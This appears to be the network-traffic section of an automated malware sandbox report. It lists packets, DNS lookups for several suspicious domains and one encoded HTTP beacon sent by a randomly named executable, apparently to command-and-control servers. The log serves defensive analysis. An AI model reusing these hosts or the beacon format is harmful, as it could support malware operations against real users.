Jan 11, 2025 02:50:44.460036039 CET	49715	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:44.471990108 CET	49715	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:44.476793051 CET	80	49715	103.224.182.242	192.168.2.8
Jan 11, 2025 02:50:45.087877035 CET	80	49715	103.224.182.242	192.168.2.8
Jan 11, 2025 02:50:45.087903023 CET	80	49715	103.224.182.242	192.168.2.8
Jan 11, 2025 02:50:45.088037968 CET	49715	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:45.983273983 CET	49715	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:47.001786947 CET	49722	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:47.006885052 CET	80	49722	103.224.182.242	192.168.2.8
Jan 11, 2025 02:50:47.007010937 CET	49722	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:47.020989895 CET	49722	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:47.025950909 CET	80	49722	103.224.182.242	192.168.2.8
Jan 11, 2025 02:50:47.026005983 CET	80	49722	103.224.182.242	192.168.2.8
Jan 11, 2025 02:50:47.622678041 CET	80	49722	103.224.182.242	192.168.2.8
Jan 11, 2025 02:50:47.622796059 CET	80	49722	103.224.182.242	192.168.2.8
Jan 11, 2025 02:50:47.622864962 CET	49722	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:48.530177116 CET	49722	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:49.549016953 CET	49738	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:49.554233074 CET	80	49738	103.224.182.242	192.168.2.8
Jan 11, 2025 02:50:49.554488897 CET	49738	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:49.563657045 CET	49738	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:50:49.568538904 CET	80	49738	103.224.182.242	192.168.2.8
Jan 11, 2025 02:51:19.559595108 CET	80	49738	103.224.182.242	192.168.2.8
Jan 11, 2025 02:51:19.559701920 CET	49738	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:51:19.560918093 CET	49738	80	192.168.2.8	103.224.182.242
Jan 11, 2025 02:51:19.565711975 CET	80	49738	103.224.182.242	192.168.2.8
Jan 11, 2025 02:51:24.611183882 CET	49952	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:24.618491888 CET	80	49952	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:24.618690014 CET	49952	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:24.633107901 CET	49952	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:24.640187025 CET	80	49952	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:25.250773907 CET	80	49952	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:25.250837088 CET	80	49952	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:25.250899076 CET	49952	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:26.139821053 CET	49952	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:27.159120083 CET	49969	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:27.164000034 CET	80	49969	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:27.164196968 CET	49969	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:27.178253889 CET	49969	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:27.183053970 CET	80	49969	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:27.778774023 CET	80	49969	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:27.778925896 CET	80	49969	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:27.779100895 CET	49969	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:28.686692953 CET	49969	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:29.893372059 CET	49986	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:29.905886889 CET	80	49986	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:29.908576012 CET	49986	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:29.925056934 CET	49986	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:29.935329914 CET	80	49986	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:29.935645103 CET	80	49986	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:30.522469044 CET	80	49986	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:30.522578001 CET	80	49986	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:30.522654057 CET	49986	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:31.436721087 CET	49986	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:32.492978096 CET	49987	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:32.497886896 CET	80	49987	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:32.497965097 CET	49987	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:32.513969898 CET	49987	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:32.518877029 CET	80	49987	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:33.106364012 CET	80	49987	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:33.106426954 CET	80	49987	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:33.106681108 CET	49987	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:33.109375000 CET	49987	80	192.168.2.8	185.27.134.206
Jan 11, 2025 02:51:33.114212990 CET	80	49987	185.27.134.206	192.168.2.8
Jan 11, 2025 02:51:39.244415998 CET	49988	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:39.249310017 CET	80	49988	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:39.249413967 CET	49988	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:39.263729095 CET	49988	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:39.268583059 CET	80	49988	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:40.201755047 CET	80	49988	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:40.201776028 CET	80	49988	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:40.201791048 CET	80	49988	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:40.201853037 CET	49988	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:40.765088081 CET	49988	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:41.784051895 CET	49989	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:41.791922092 CET	80	49989	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:41.792031050 CET	49989	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:41.808140039 CET	49989	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:41.816028118 CET	80	49989	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:42.729742050 CET	80	49989	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:42.729765892 CET	80	49989	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:42.729784012 CET	80	49989	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:42.729834080 CET	49989	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:43.311774015 CET	49989	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:44.330687046 CET	49990	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:44.335733891 CET	80	49990	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:44.335866928 CET	49990	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:44.350641966 CET	49990	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:44.355457067 CET	80	49990	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:44.355582952 CET	80	49990	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:45.271297932 CET	80	49990	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:45.271327019 CET	80	49990	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:45.271342039 CET	80	49990	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:45.271495104 CET	49990	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:45.858689070 CET	49990	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:46.878930092 CET	49991	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:46.884016037 CET	80	49991	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:46.884133101 CET	49991	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:46.899147034 CET	49991	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:46.904138088 CET	80	49991	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:47.842818975 CET	80	49991	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:47.842837095 CET	80	49991	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:47.842865944 CET	80	49991	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:47.843058109 CET	49991	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:47.843106985 CET	49991	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:47.845752001 CET	49991	80	192.168.2.8	165.154.96.210
Jan 11, 2025 02:51:47.852390051 CET	80	49991	165.154.96.210	192.168.2.8
Jan 11, 2025 02:51:52.894227982 CET	49992	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:52.899121046 CET	80	49992	45.141.156.114	192.168.2.8
Jan 11, 2025 02:51:52.899226904 CET	49992	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:52.913625956 CET	49992	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:52.919581890 CET	80	49992	45.141.156.114	192.168.2.8
Jan 11, 2025 02:51:53.587327003 CET	80	49992	45.141.156.114	192.168.2.8
Jan 11, 2025 02:51:53.587425947 CET	80	49992	45.141.156.114	192.168.2.8
Jan 11, 2025 02:51:53.587480068 CET	49992	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:54.421331882 CET	49992	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:55.440582991 CET	49993	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:55.445504904 CET	80	49993	45.141.156.114	192.168.2.8
Jan 11, 2025 02:51:55.445641994 CET	49993	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:55.460292101 CET	49993	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:55.465804100 CET	80	49993	45.141.156.114	192.168.2.8
Jan 11, 2025 02:51:56.128604889 CET	80	49993	45.141.156.114	192.168.2.8
Jan 11, 2025 02:51:56.128633022 CET	80	49993	45.141.156.114	192.168.2.8
Jan 11, 2025 02:51:56.128674984 CET	49993	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:56.969680071 CET	49993	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:57.986789942 CET	49994	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:57.991996050 CET	80	49994	45.141.156.114	192.168.2.8
Jan 11, 2025 02:51:57.992084980 CET	49994	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:58.006774902 CET	49994	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:58.011677027 CET	80	49994	45.141.156.114	192.168.2.8
Jan 11, 2025 02:51:58.011852980 CET	80	49994	45.141.156.114	192.168.2.8
Jan 11, 2025 02:51:58.703334093 CET	80	49994	45.141.156.114	192.168.2.8
Jan 11, 2025 02:51:58.703433037 CET	80	49994	45.141.156.114	192.168.2.8
Jan 11, 2025 02:51:58.703510046 CET	49994	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:51:59.515052080 CET	49994	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:52:00.533998966 CET	49995	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:52:00.542232037 CET	80	49995	45.141.156.114	192.168.2.8
Jan 11, 2025 02:52:00.542362928 CET	49995	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:52:00.551803112 CET	49995	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:52:00.557965994 CET	80	49995	45.141.156.114	192.168.2.8
Jan 11, 2025 02:52:01.372052908 CET	80	49995	45.141.156.114	192.168.2.8
Jan 11, 2025 02:52:01.372077942 CET	80	49995	45.141.156.114	192.168.2.8
Jan 11, 2025 02:52:01.372143030 CET	80	49995	45.141.156.114	192.168.2.8
Jan 11, 2025 02:52:01.372194052 CET	49995	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:52:01.375072956 CET	49995	80	192.168.2.8	45.141.156.114
Jan 11, 2025 02:52:01.382507086 CET	80	49995	45.141.156.114	192.168.2.8
Jan 11, 2025 02:52:06.862638950 CET	49996	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:06.867528915 CET	80	49996	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:06.867645025 CET	49996	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:06.887504101 CET	49996	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:06.892539978 CET	80	49996	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:07.644983053 CET	80	49996	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:07.686906099 CET	49996	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:07.732291937 CET	80	49996	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:07.732420921 CET	49996	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:08.396249056 CET	49996	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:09.408751011 CET	49997	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:09.413547039 CET	80	49997	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:09.413619041 CET	49997	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:09.428361893 CET	49997	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:09.433895111 CET	80	49997	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:10.185821056 CET	80	49997	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:10.233827114 CET	49997	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:10.274565935 CET	80	49997	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:10.274744987 CET	49997	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:10.936980009 CET	49997	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:11.956360102 CET	49998	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:11.961801052 CET	80	49998	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:11.961941004 CET	49998	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:11.976893902 CET	49998	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:11.981956959 CET	80	49998	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:11.981971979 CET	80	49998	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:12.760494947 CET	80	49998	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:12.815824986 CET	49998	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:12.851682901 CET	80	49998	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:12.851795912 CET	49998	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:13.484041929 CET	49998	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:14.505641937 CET	49999	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:14.609694004 CET	80	49999	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:14.609801054 CET	49999	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:14.619412899 CET	49999	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:14.625494957 CET	80	49999	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:15.390369892 CET	80	49999	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:15.437069893 CET	49999	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:15.477246046 CET	80	49999	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:15.477346897 CET	49999	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:15.478312969 CET	49999	80	192.168.2.8	27.124.4.246
Jan 11, 2025 02:52:15.483738899 CET	80	49999	27.124.4.246	192.168.2.8
Jan 11, 2025 02:52:20.502094030 CET	50000	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:20.506906033 CET	80	50000	188.114.96.3	192.168.2.8
Jan 11, 2025 02:52:20.506993055 CET	50000	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:20.521920919 CET	50000	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:20.526875973 CET	80	50000	188.114.96.3	192.168.2.8
Jan 11, 2025 02:52:22.030844927 CET	50000	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:22.038594007 CET	80	50000	188.114.96.3	192.168.2.8
Jan 11, 2025 02:52:22.038701057 CET	50000	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:23.050096035 CET	50001	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:23.055506945 CET	80	50001	188.114.96.3	192.168.2.8
Jan 11, 2025 02:52:23.055640936 CET	50001	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:23.071086884 CET	50001	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:23.076004028 CET	80	50001	188.114.96.3	192.168.2.8
Jan 11, 2025 02:52:24.577857971 CET	50001	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:24.584939957 CET	80	50001	188.114.96.3	192.168.2.8
Jan 11, 2025 02:52:24.585026979 CET	50001	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:25.597105980 CET	50002	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:25.602024078 CET	80	50002	188.114.96.3	192.168.2.8
Jan 11, 2025 02:52:25.602174044 CET	50002	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:25.616723061 CET	50002	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:25.621891975 CET	80	50002	188.114.96.3	192.168.2.8
Jan 11, 2025 02:52:25.622241020 CET	80	50002	188.114.96.3	192.168.2.8
Jan 11, 2025 02:52:27.124691010 CET	50002	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:27.129784107 CET	80	50002	188.114.96.3	192.168.2.8
Jan 11, 2025 02:52:27.129887104 CET	50002	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:28.143446922 CET	50003	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:28.149280071 CET	80	50003	188.114.96.3	192.168.2.8
Jan 11, 2025 02:52:28.149447918 CET	50003	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:28.158870935 CET	50003	80	192.168.2.8	188.114.96.3
Jan 11, 2025 02:52:28.163626909 CET	80	50003	188.114.96.3	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 02:50:12.261185884 CET	64947	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:50:12.282674074 CET	53	64947	1.1.1.1	192.168.2.8
Jan 11, 2025 02:50:28.033911943 CET	57436	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:50:28.051901102 CET	53	57436	1.1.1.1	192.168.2.8
Jan 11, 2025 02:50:41.597018003 CET	58480	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:50:41.900723934 CET	53	58480	1.1.1.1	192.168.2.8
Jan 11, 2025 02:51:24.564887047 CET	49174	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:51:24.608361959 CET	53	49174	1.1.1.1	192.168.2.8
Jan 11, 2025 02:51:38.127638102 CET	52580	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:51:39.140043020 CET	52580	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:51:39.241677999 CET	53	52580	1.1.1.1	192.168.2.8
Jan 11, 2025 02:51:39.241694927 CET	53	52580	1.1.1.1	192.168.2.8
Jan 11, 2025 02:51:52.862869978 CET	58653	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:51:52.891182899 CET	53	58653	1.1.1.1	192.168.2.8
Jan 11, 2025 02:52:06.395587921 CET	54084	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:52:06.859368086 CET	53	54084	1.1.1.1	192.168.2.8
Jan 11, 2025 02:52:20.488049984 CET	56191	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:52:20.499654055 CET	53	56191	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 02:50:12.261185884 CET	192.168.2.8	1.1.1.1	0xefac	Standard query (0)	www.izmirescortg.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:50:28.033911943 CET	192.168.2.8	1.1.1.1	0x7701	Standard query (0)	www.aballanet.cat	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:50:41.597018003 CET	192.168.2.8	1.1.1.1	0x821d	Standard query (0)	www.madhf.tech	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:51:24.564887047 CET	192.168.2.8	1.1.1.1	0x35d4	Standard query (0)	www.canadavinreport.site	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:51:38.127638102 CET	192.168.2.8	1.1.1.1	0x2ef5	Standard query (0)	www.yunlekeji.top	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:51:39.140043020 CET	192.168.2.8	1.1.1.1	0x2ef5	Standard query (0)	www.yunlekeji.top	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:51:52.862869978 CET	192.168.2.8	1.1.1.1	0x1de5	Standard query (0)	www.logidant.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:52:06.395587921 CET	192.168.2.8	1.1.1.1	0x7ede	Standard query (0)	www.laohub10.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:52:20.488049984 CET	192.168.2.8	1.1.1.1	0x453c	Standard query (0)	www.zkdamdjj.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 02:50:12.282674074 CET	1.1.1.1	192.168.2.8	0xefac	No error (0)	www.izmirescortg.xyz		172.67.186.192	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:50:12.282674074 CET	1.1.1.1	192.168.2.8	0xefac	No error (0)	www.izmirescortg.xyz		104.21.36.62	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:50:28.051901102 CET	1.1.1.1	192.168.2.8	0x7701	No error (0)	www.aballanet.cat	aballanet.cat		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:50:28.051901102 CET	1.1.1.1	192.168.2.8	0x7701	No error (0)	aballanet.cat		134.0.14.158	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:50:41.900723934 CET	1.1.1.1	192.168.2.8	0x821d	No error (0)	www.madhf.tech		103.224.182.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:51:24.608361959 CET	1.1.1.1	192.168.2.8	0x35d4	No error (0)	www.canadavinreport.site		185.27.134.206	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:51:39.241677999 CET	1.1.1.1	192.168.2.8	0x2ef5	No error (0)	www.yunlekeji.top	www-yunlekeji-top.lo0.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:51:39.241677999 CET	1.1.1.1	192.168.2.8	0x2ef5	No error (0)	www-yunlekeji-top.lo0.faipod.com	fap-a13f5c64.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:51:39.241677999 CET	1.1.1.1	192.168.2.8	0x2ef5	No error (0)	fap-a13f5c64.faipod.com		165.154.96.210	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:51:39.241694927 CET	1.1.1.1	192.168.2.8	0x2ef5	No error (0)	www.yunlekeji.top	www-yunlekeji-top.lo0.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:51:39.241694927 CET	1.1.1.1	192.168.2.8	0x2ef5	No error (0)	www-yunlekeji-top.lo0.faipod.com	fap-a13f5c64.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:51:39.241694927 CET	1.1.1.1	192.168.2.8	0x2ef5	No error (0)	fap-a13f5c64.faipod.com		165.154.96.210	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:51:52.891182899 CET	1.1.1.1	192.168.2.8	0x1de5	No error (0)	www.logidant.xyz	logidant.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:51:52.891182899 CET	1.1.1.1	192.168.2.8	0x1de5	No error (0)	logidant.xyz		45.141.156.114	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:52:06.859368086 CET	1.1.1.1	192.168.2.8	0x7ede	No error (0)	www.laohub10.net	r0lqcud7.nbnnn.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:52:06.859368086 CET	1.1.1.1	192.168.2.8	0x7ede	No error (0)	r0lqcud7.nbnnn.xyz		27.124.4.246	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:52:06.859368086 CET	1.1.1.1	192.168.2.8	0x7ede	No error (0)	r0lqcud7.nbnnn.xyz		202.79.161.151	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:52:06.859368086 CET	1.1.1.1	192.168.2.8	0x7ede	No error (0)	r0lqcud7.nbnnn.xyz		23.225.159.42	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:52:06.859368086 CET	1.1.1.1	192.168.2.8	0x7ede	No error (0)	r0lqcud7.nbnnn.xyz		23.225.160.132	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:52:20.499654055 CET	1.1.1.1	192.168.2.8	0x453c	No error (0)	www.zkdamdjj.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:52:20.499654055 CET	1.1.1.1	192.168.2.8	0x453c	No error (0)	www.zkdamdjj.shop		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.izmirescortg.xyz

www.aballanet.cat

www.madhf.tech

www.canadavinreport.site

www.yunlekeji.top

www.logidant.xyz

www.laohub10.net

www.zkdamdjj.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49708	172.67.186.192	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:50:12.302800894 CET	379	OUT	GET /lnl7/?Ih6=GzF8v0ph3F&T0JX6z9=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA== HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.izmirescortg.xyz User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 02:50:12.987030029 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:50:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ImrMpkmAsfhOWBCeZmpUyqIBfxtMqRI3xbnbv1eu34%2FlnQnjILlQ2RMZomhhxoAq%2BFOuPs8JQNt4jWiqjjf0J843oouERaVVFSe29ozky%2FVLi6qV7pLiF%2BvKjtAoKGSezj8BQMVVQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900141318ac943dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1746&rtt_var=873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=379&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 64 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 